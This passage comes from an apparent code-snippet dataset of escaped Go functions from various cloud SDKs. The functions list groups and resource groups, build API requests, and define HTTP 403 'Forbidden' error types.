*QueryUserGroupsForbidden {\n\treturn &QueryUserGroupsForbidden{}\n}", "func (client *Client) ListResourceGroupsWithOptions(request *ListResourceGroupsRequest, runtime *util.RuntimeOptions) (_result *ListResourceGroupsResponse, _err error) {\n\t_err = util.ValidateModel(request)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\tquery := map[string]interface{}{}\n\tif !tea.BoolValue(util.IsUnset(request.DisplayName)) {\n\t\tquery[\"DisplayName\"] = request.DisplayName\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.IncludeTags)) {\n\t\tquery[\"IncludeTags\"] = request.IncludeTags\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Name)) {\n\t\tquery[\"Name\"] = request.Name\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.PageNumber)) {\n\t\tquery[\"PageNumber\"] = request.PageNumber\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.PageSize)) {\n\t\tquery[\"PageSize\"] = request.PageSize\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ResourceGroupId)) {\n\t\tquery[\"ResourceGroupId\"] = request.ResourceGroupId\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ResourceGroupIds)) {\n\t\tquery[\"ResourceGroupIds\"] = request.ResourceGroupIds\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Status)) {\n\t\tquery[\"Status\"] = request.Status\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Tag)) {\n\t\tquery[\"Tag\"] = request.Tag\n\t}\n\n\treq := &openapi.OpenApiRequest{\n\t\tQuery: openapiutil.Query(query),\n\t}\n\tparams := &openapi.Params{\n\t\tAction: tea.String(\"ListResourceGroups\"),\n\t\tVersion: tea.String(\"2020-03-31\"),\n\t\tProtocol: tea.String(\"HTTPS\"),\n\t\tPathname: tea.String(\"/\"),\n\t\tMethod: tea.String(\"POST\"),\n\t\tAuthType: tea.String(\"AK\"),\n\t\tStyle: tea.String(\"RPC\"),\n\t\tReqBodyType: tea.String(\"formData\"),\n\t\tBodyType: tea.String(\"json\"),\n\t}\n\t_result = &ListResourceGroupsResponse{}\n\t_body, _err := client.CallApi(params, req, runtime)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\t_err = tea.Convert(_body, &_result)\n\treturn _result, _err\n}", "func (client *ContainerGroupsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ContainerGroupsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerInstance/containerGroups\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-05-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewUpdateUserGroupsForbidden() *UpdateUserGroupsForbidden {\n\treturn &UpdateUserGroupsForbidden{}\n}", "func Forbidden(msg string) Error {\n\te := err{msg: msg, code: forbiddenCode, group: generic, kind: forbidden}\n\treturn &e\n}", "func (client IdentityClient) listDynamicGroups(ctx context.Context, request common.OCIRequest, binaryReqBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (common.OCIResponse, error) {\n\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/dynamicGroups\", binaryReqBody, extraHeaders)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response ListDynamicGroupsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func NewPcloudVolumegroupsGetForbidden() *PcloudVolumegroupsGetForbidden {\n\treturn &PcloudVolumegroupsGetForbidden{}\n}", "func (c *MockResourceGroupsClient) List(ctx context.Context, filter string) ([]resources.Group, error) {\n\tif filter != \"\" {\n\t\treturn nil, fmt.Errorf(\"unsupported non-empty filter: %s\", filter)\n\t}\n\tvar l []resources.Group\n\tfor _, rg := range c.RGs {\n\t\tl = append(l, rg)\n\t}\n\treturn l, nil\n}", "func (m *AccessPackage) SetIncompatibleGroups(value []Groupable)() {\n m.incompatibleGroups = value\n}", "func CreateListServerGroupsResponse() (response *ListServerGroupsResponse) {\n\tresponse = &ListServerGroupsResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func Forbidden(format string, args ...interface{}) error {\n\treturn New(http.StatusForbidden, format, args...)\n}", "func Forbidden(messages ...string) Error {\n\treturn createMessageError(http.StatusText(http.StatusForbidden), messages)\n}", "func (client *IotSecuritySolutionClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *IotSecuritySolutionClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Security/iotSecuritySolutions\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2019-08-01\")\n\tif options != nil && options.Filter != nil {\n\t\treqQP.Set(\"$filter\", *options.Filter)\n\t}\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewGetGroupsByDisplayNameUsingGETForbidden() *GetGroupsByDisplayNameUsingGETForbidden {\n\treturn &GetGroupsByDisplayNameUsingGETForbidden{}\n}", "func TestListIamGroups(t *testing.T) {\n\tt.Parallel()\n\n\tregion, err := getRandomRegion()\n\trequire.NoError(t, err)\n\n\tlocalSession, err := session.NewSession(&awsgo.Config{\n\t\tRegion: awsgo.String(region),\n\t})\n\trequire.NoError(t, err)\n\n\tgroupNames, err := getAllIamGroups(localSession, time.Now(), config.Config{})\n\trequire.NoError(t, err)\n\tassert.NotEmpty(t, groupNames)\n}", "func NewDeleteCIDGroupsForbidden() *DeleteCIDGroupsForbidden {\n\treturn &DeleteCIDGroupsForbidden{}\n}", "func TestGroupDataSource_DoesNotSwallowListGroupError(t *testing.T) {\n\tctrl := gomock.NewController(t)\n\tdefer ctrl.Finish()\n\n\tprojectID := uuid.New()\n\tresourceData := createResourceData(t, projectID.String(), \"group-name\")\n\n\tgraphClient := azdosdkmocks.NewMockGraphClient(ctrl)\n\tclients := &client.AggregatedClient{GraphClient: graphClient, Ctx: context.Background()}\n\n\texpectedProjectDescriptorLookupArgs := graph.GetDescriptorArgs{StorageKey: &projectID}\n\tprojectDescriptor := converter.String(\"descriptor\")\n\tprojectDescriptorResponse := graph.GraphDescriptorResult{Value: projectDescriptor}\n\tgraphClient.\n\t\tEXPECT().\n\t\tGetDescriptor(clients.Ctx, expectedProjectDescriptorLookupArgs).\n\t\tReturn(&projectDescriptorResponse, nil)\n\n\texpectedListGroupArgs := graph.ListGroupsArgs{ScopeDescriptor: projectDescriptor}\n\tgraphClient.\n\t\tEXPECT().\n\t\tListGroups(clients.Ctx, expectedListGroupArgs).\n\t\tReturn(nil, errors.New(\"ListGroups() Failed\"))\n\n\terr := dataSourceGroupRead(resourceData, clients)\n\trequire.Contains(t, err.Error(), \"ListGroups() Failed\")\n}", "func NewGetGroupMembersListV1Forbidden() *GetGroupMembersListV1Forbidden {\n\treturn &GetGroupMembersListV1Forbidden{}\n}", "func (client WorkloadNetworksClient) ListVMGroupsPreparer(ctx context.Context, resourceGroupName string, privateCloudName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"privateCloudName\": autorest.Encode(\"path\", privateCloudName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-07-17-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AVS/privateClouds/{privateCloudName}/workloadNetworks/default/vmGroups\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func ListUserGroup(w http.ResponseWriter, r *http.Request) {\n\tfLog := userMgmtLogger.WithField(\"func\", \"ListUserGroup\").WithField(\"RequestID\", r.Context().Value(constants.RequestID)).WithField(\"path\", r.URL.Path).WithField(\"method\", r.Method)\n\n\tiauthctx := r.Context().Value(constants.HansipAuthentication)\n\tif iauthctx == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusUnauthorized, \"You are not authorized to access this resource\", nil, nil)\n\t\treturn\n\t}\n\n\tparams, err := helper.ParsePathParams(fmt.Sprintf(\"%s/management/user/{userRecId}/groups\", apiPrefix), r.URL.Path)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tuser, err := UserRepo.GetUserByRecID(r.Context(), params[\"userRecId\"])\n\tif err != nil {\n\t\tfLog.Errorf(\"UserRepo.GetUserByRecID got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusInternalServerError, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tif user == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusNotFound, fmt.Sprintf(\"User recid %s not found\", params[\"userRecId\"]), nil, nil)\n\t\treturn\n\t}\n\n\tpageRequest, err := helper.NewPageRequestFromRequest(r)\n\tif err != nil {\n\t\tfLog.Errorf(\"helper.NewPageRequestFromRequest got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusBadRequest, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tgroups, page, err := UserGroupRepo.ListUserGroupByUser(r.Context(), user, pageRequest)\n\tif err != nil {\n\t\tfLog.Errorf(\"UserGroupRepo.ListUserGroupByUser got %s\", err.Error())\n\t}\n\tsgroups := make([]*SimpleGroup, len(groups))\n\tfor k, v := range groups {\n\t\tsgroups[k] = &SimpleGroup{\n\t\t\tRecID: v.RecID,\n\t\t\tGroupName: v.GroupName,\n\t\t}\n\t}\n\tret := make(map[string]interface{})\n\tret[\"groups\"] = sgroups\n\tret[\"page\"] = page\n\thelper.WriteHTTPResponse(r.Context(), w, http.StatusOK, \"List of groups paginated\", nil, ret)\n}", "func NewDeleteUserGroupsForbidden() *DeleteUserGroupsForbidden {\n\treturn &DeleteUserGroupsForbidden{}\n}", "func CreateListExperimentGroupsRequest() (request *ListExperimentGroupsRequest) {\n\trequest = &ListExperimentGroupsRequest{\n\t\tRoaRequest: &requests.RoaRequest{},\n\t}\n\trequest.InitWithApiInfo(\"PaiRecService\", \"2022-12-13\", \"ListExperimentGroups\", \"/api/v1/experimentgroups\", \"\", \"\")\n\trequest.Method = requests.GET\n\treturn\n}", "func (rm *resourceManager) newListRequestPayload(\n\tr *resource,\n) (*svcsdk.DescribeReplicationGroupsInput, error) {\n\tres := &svcsdk.DescribeReplicationGroupsInput{}\n\n\tif r.ko.Spec.ReplicationGroupID != nil {\n\t\tres.SetReplicationGroupId(*r.ko.Spec.ReplicationGroupID)\n\t}\n\n\treturn res, nil\n}", "func NewListProvidersForbidden() *ListProvidersForbidden {\n\treturn &ListProvidersForbidden{}\n}", "func NewListPermissionForbidden() *ListPermissionForbidden {\n\treturn &ListPermissionForbidden{}\n}", "func (client *ManagedClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ManagedClustersClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2020-11-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (client *ClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ClustersListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/clusters\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.ep, urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2021-06-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (client *PolicyDefinitionsClient) listByManagementGroupCreateRequest(ctx context.Context, managementGroupID string, options *PolicyDefinitionsListByManagementGroupOptions) (*policy.Request, error) {\n\turlPath := \"/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions\"\n\tif managementGroupID == \"\" {\n\t\treturn nil, errors.New(\"parameter managementGroupID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{managementGroupId}\", url.PathEscape(managementGroupID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.ep, urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2021-06-01\")\n\tif options != nil && options.Top != nil {\n\t\treqQP.Set(\"$top\", strconv.FormatInt(int64(*options.Top), 10))\n\t}\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\tunencodedParams := []string{req.Raw().URL.RawQuery}\n\tif options != nil && options.Filter != nil {\n\t\tunencodedParams = append(unencodedParams, \"$filter=\"+*options.Filter)\n\t}\n\treq.Raw().URL.RawQuery = strings.Join(unencodedParams, \"&\")\n\treq.Raw().Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (m *GraphBaseServiceClient) Groups()(*ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.GroupsRequestBuilder) {\n return ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.NewGroupsRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (m *GraphBaseServiceClient) Groups()(*ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.GroupsRequestBuilder) {\n return ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.NewGroupsRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (client *PrivateDNSZoneGroupsClient) listCreateRequest(ctx context.Context, privateEndpointName string, resourceGroupName string, options *PrivateDNSZoneGroupsClientListOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateEndpoints/{privateEndpointName}/privateDnsZoneGroups\"\n\tif privateEndpointName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateEndpointName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateEndpointName}\", url.PathEscape(privateEndpointName))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-04-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewForbidden(err error, msg ...string) *Errs {\n\tif err == nil {\n\t\terr = ErrForbidden\n\t}\n\n\treturn &Errs{\n\t\tcodeHTTP: http.StatusForbidden,\n\t\terr: err,\n\t\tkind: trace(2),\n\t\tmessage: msg,\n\t}\n}", "func (_e *MockQueryCoord_Expecter) ListResourceGroups(ctx interface{}, req interface{}) *MockQueryCoord_ListResourceGroups_Call {\n\treturn &MockQueryCoord_ListResourceGroups_Call{Call: _e.mock.On(\"ListResourceGroups\", ctx, req)}\n}", "func NewQueryCIDGroupsForbidden() *QueryCIDGroupsForbidden {\n\treturn &QueryCIDGroupsForbidden{}\n}", "func (*ListDashboardGroupsRequest) Descriptor() ([]byte, []int) {\n\treturn file_data_proto_rawDescGZIP(), []int{2}\n}", "func (client IdentityClient) listGroups(ctx context.Context, request common.OCIRequest, binaryReqBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (common.OCIResponse, error) {\n\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/groups\", binaryReqBody, extraHeaders)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response ListGroupsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (ggSession *GreengrassSession) ListGroup(name string) error {\n\tvar id string\n\n\tif name != \"\" {\n\t\tlistOutput, err := ggSession.greengrass.ListGroups(&greengrass.ListGroupsInput{})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor _, v := range listOutput.Groups {\n\t\t\tif name == *v.Name {\n\t\t\t\tid = *v.Id\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif id == \"\" {\n\t\t\treturn fmt.Errorf(\"group %s not found\", name)\n\t\t}\n\t} else {\n\t\tid = ggSession.config.Group.ID\n\t}\n\n\tgroup, err := ggSession.greengrass.GetGroup(&greengrass.GetGroupInput{\n\t\tGroupId: &id,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group: %v\\n\", group)\n\n\tif group.LatestVersion == nil {\n\t\treturn nil\n\t}\n\n\tgroupVersion, err := ggSession.greengrass.GetGroupVersion(&greengrass.GetGroupVersionInput{\n\t\tGroupId: group.Id,\n\t\tGroupVersionId: group.LatestVersion,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group version: %v\\n\", groupVersion)\n\n\treturn nil\n}", "func (client *LocalRulestacksClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *LocalRulestacksClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/PaloAltoNetworks.Cloudngfw/localRulestacks\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2022-08-29\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func GetExclusionGroups(settings *playfab.Settings, postData *GetExclusionGroupsRequestModel, entityToken string) (*GetExclusionGroupsResultModel, error) {\r\n if entityToken == \"\" {\n return nil, playfab.NewCustomError(\"entityToken should not be an empty string\", playfab.ErrorGeneric)\n }\r\n b, errMarshal := json.Marshal(postData)\r\n if errMarshal != nil {\r\n return nil, playfab.NewCustomError(errMarshal.Error(), playfab.ErrorMarshal)\r\n }\r\n\r\n sourceMap, err := playfab.Request(settings, b, \"/Experimentation/GetExclusionGroups\", \"X-EntityToken\", entityToken)\r\n if err != nil {\r\n return nil, err\r\n }\r\n \r\n result := &GetExclusionGroupsResultModel{}\r\n\r\n config := mapstructure.DecoderConfig{\r\n DecodeHook: playfab.StringToDateTimeHook,\r\n Result: result,\r\n }\r\n \r\n decoder, errDecoding := mapstructure.NewDecoder(&config)\r\n if errDecoding != nil {\r\n return nil, playfab.NewCustomError(errDecoding.Error(), playfab.ErrorDecoding)\r\n }\r\n \r\n errDecoding = decoder.Decode(sourceMap)\r\n if errDecoding != nil {\r\n return nil, playfab.NewCustomError(errDecoding.Error(), playfab.ErrorDecoding)\r\n }\r\n\r\n return result, nil\r\n}", "func ListGroupPath() string {\n\treturn \"/api/group\"\n}", "func (c *MockNetworkSecurityGroupsClient) List(ctx context.Context, resourceGroupName string) ([]network.SecurityGroup, error) {\n\tvar l []network.SecurityGroup\n\tfor _, nsg := range c.NSGs {\n\t\tl = append(l, nsg)\n\t}\n\treturn l, nil\n}", "func NewObjectsListForbidden() *ObjectsListForbidden {\n\n\treturn &ObjectsListForbidden{}\n}", "func Forbidden(message ...interface{}) Err {\n\treturn Boomify(http.StatusForbidden, message...)\n}", "func NewPostVolumeGroupsListDefault(code int) *PostVolumeGroupsListDefault {\n\treturn &PostVolumeGroupsListDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewListIdpGroupMappingsForbidden() *ListIdpGroupMappingsForbidden {\n\treturn &ListIdpGroupMappingsForbidden{}\n}", "func NewUserGroupListBadRequest() *UserGroupListBadRequest {\n\treturn &UserGroupListBadRequest{}\n}", "func (*ListGroupsRequest) Descriptor() ([]byte, []int) {\n\treturn file_api_proto_rawDescGZIP(), []int{58}\n}", "func NewGetGroupListPublicV1Forbidden() *GetGroupListPublicV1Forbidden {\n\treturn &GetGroupListPublicV1Forbidden{}\n}", "func NewGetIPAMvrfgroupForbidden() *GetIPAMvrfgroupForbidden {\n\treturn &GetIPAMvrfgroupForbidden{}\n}", "func (client *DataCollectionEndpointsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *DataCollectionEndpointsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/dataCollectionEndpoints\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.host, urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2021-04-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (c *Client) ListProtectionGroups(ctx context.Context, params *ListProtectionGroupsInput, optFns ...func(*Options)) (*ListProtectionGroupsOutput, error) {\n\tif params == nil {\n\t\tparams = &ListProtectionGroupsInput{}\n\t}\n\n\tresult, metadata, err := c.invokeOperation(ctx, \"ListProtectionGroups\", params, optFns, addOperationListProtectionGroupsMiddlewares)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tout := result.(*ListProtectionGroupsOutput)\n\tout.ResultMetadata = metadata\n\treturn out, nil\n}", "func NewPcloudPlacementgroupsPostForbidden() *PcloudPlacementgroupsPostForbidden {\n\treturn &PcloudPlacementgroupsPostForbidden{}\n}", "func NewListTeamsForbidden() *ListTeamsForbidden {\n\treturn &ListTeamsForbidden{}\n}", "func NewListGroupsOK() *ListGroupsOK {\n\treturn &ListGroupsOK{}\n}", "func (client *IPAllocationsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *IPAllocationsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/IpAllocations\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-04-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func Forbidden(msg string) error {\n\treturn &forbiddenError{errors.New(msg)}\n}", "func (client LabClient) ListByResourceGroupSender(req *http.Request) (*http.Response, error) {\n\treturn autorest.SendWithSender(client, req,\n\t\tazure.DoRetryWithRegistration(client.Client))\n}", "func (c *Client) ListGroups() ([]string, error) {\n\tvar groups []string\n\tif !c.authenticated {\n\t\treturn groups, errors.New(\"Not authenticated. Call Authenticate first\")\n\t}\n\n\tmsg := common.NewMessage(c.userId, \"server\",\n\t\t\"control\", \"remove_to_group\", time.Time{},\n\t\tcommon.TEXT, \"\")\n\n\tencoded, err := msg.Json()\n\tif err != nil {\n\t\tlog.Println(\"Failed to encode list groups message\", err)\n\t\treturn groups, err\n\t}\n\n\terr = c.transport.SendText(string(encoded))\n\tif err != nil {\n\t\tlog.Println(\"Failed to send list groups message\", err)\n\t\treturn groups, err\n\t}\n\n\tresp := <-c.Out\n\tif resp.Status() == common.STATUS_ERROR {\n\t\terrMsg := resp.Error()\n\t\tlog.Println(\"Delete group response error\", errMsg)\n\t\treturn groups, errors.New(errMsg)\n\t}\n\n\tgroups, _ = resp.GetJsonData(\"groups\").([]string)\n\treturn groups, nil\n}", "func (a *Client) PublicListReasonGroups(params *PublicListReasonGroupsParams, authInfo runtime.ClientAuthInfoWriter) (*PublicListReasonGroupsOK, *PublicListReasonGroupsInternalServerError, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewPublicListReasonGroupsParams()\n\t}\n\n\tif params.Context == nil {\n\t\tparams.Context = context.Background()\n\t}\n\n\tif params.RetryPolicy != nil {\n\t\tparams.SetHTTPClientTransport(params.RetryPolicy)\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"publicListReasonGroups\",\n\t\tMethod: 